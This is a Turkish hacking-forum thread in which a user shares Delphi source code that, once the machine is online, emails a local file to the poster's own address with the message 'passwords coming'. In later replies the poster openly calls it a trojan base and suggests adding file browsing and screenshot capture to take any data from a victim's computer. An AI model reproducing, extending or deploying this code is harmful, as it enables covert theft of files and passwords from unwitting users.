port dinliyor istenilen dosyayı mail le yolluyor

bymxx

Üye
26 Ocak 2007
185
0
BURSA
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, Psock, NMsmtp,shellapi, ExtCtrls,IdIPWatch, IdBaseComponent, IdComponent;
type
TForm1 = class(TForm)
Button1: TButton;
NMSMTP1: TNMSMTP;
Timer1: TTimer;
Edit1: TEdit;
IdIPWatch1: TIdIPWatch;
procedure Button1Click(Sender: TObject);
procedure NMSMTP1Connect(Sender: TObject);
procedure NMSMTP1Success(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
//timer ın içine aşağıdaki kodları yazın.Unutmayın interval değeri 100000 olmalı
// yoksa hata veriyor
procedure TForm1.Timer1Timer(Sender: TObject);
var
i:integer;
begin
if IdIPWatch1.LocalIP = '127.0.0.1' then
ShowMessage('Ofline')
//bu alana işlemesini istediğiniz başka bir kodda yazabilirsiniz.
else
i:=0;
//ShowMessage('online');
NMSMTP1.Host := 'mail.bilmemne.com';
NMSMTP1.UserID := 'bu alana mail adresinizi yazın';
NMSMTP1.Connect;
NMSMTP1.PostMessage.FromAddress := 'bu alanada mail adresinizi yazın';
NMSMTP1.PostMessage.ToAddress.Text := 'göndericeğiniz ikinci mail adresi yazın';
NMSMTP1.PostMessage.ToCarbonCopy.Text := '[email protected]';
NMSMTP1.PostMessage.ToBlindCarbonCopy.Text := '[email protected]';
NMSMTP1.PostMessage.Body.Text := 'şifreler geliyor';
NMSMTP1.PostMessage.Attachments.Text := 'c:\deneme.txt';//bu alanı istediğiniz gibi geliştirebilirsiniz.ben sadece deneme amaçlı yaptım.
NMSMTP1.PostMessage.Subject := 'şifreler geldi';
NMSMTP1.SendMail;
NMSMTP1.Disconnect;
i:=i+1;//bu alan ise bir kere maili bir defa göndermesi için tasarlandı. Ki hata vermesin
if i=1 then
form1.Close;//ben deneme amaçlı formu kapattırdım.Siz farklı kodlarla farklı işlemler yaptırabilirsiniz.sleeep ile sistemi bekletip yeniden mail yollatabilirsiniz misal
end;
end.

espirix35

Yeni üye
12 Şub 2007
30
0
eywallah kardes okulda 2+2=4 baska bişiii yok
Esas delphi burda:D saolasın
Çalışmaların kodlar kadar yararlı ve yapıcı olsun:) kib

delhpi

Yeni üye
5 Tem 2007
1
0
iyi günler ben aranıza yeni katıldım.delphi hakkında orta düzey bilgim var ancak 1 yılı aşkındır vizelerle finallerle uğraşmaktan bakamadım.
ilk sorumu bismillah diyerek soruyorum.

bu kodun tam olarak ne işe yaradığını söylermisin?Göünüt itibariyle port dinliyor dinlemesine ve mail adresine mail gönderiyor ama o portu dinlerken ne gibi bilgileri dinliyor yani IdIPWatch1 bileşeni burada ne işe yarıyor ? bu kodları tam oarlak açıklarsan sevinirim.mail gönderme ksımını biliyorum o kısma gerek yok teşekkürler...

bymxx

Üye
26 Ocak 2007
185
0
BURSA
izindeyim ve bu hafta buradayım bana soru sorun baylar bayanlar

mail olayında sorun yoksa bu güzel az çok bi temel var trojan kodladıysan bilmen gerekir karşıyı ağına düşürdükten sonra trojan mantığıyla istediğin dosyayı çekebilirsin ekran görüntüsünü dahi alabilirsin sadece hayal et ve maille kendine yollattır sana tavsiyem dosya yollarını tek tek yazma açılır pencere ile karşının bütün dosyalarını gösteren bi kod yaz bu senin için daha kolay olur kib ben daha buradayım yardımcı olmaya çalışırım by by
[email protected]

xyz14

Yeni üye
4 Ağu 2007
7
0
Timer koymuşsun da hangi aralıklar la gelecek sana bu dosya anlayamadım ? ve

hangi port dinlenıor ve o porttan sana gelıor

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.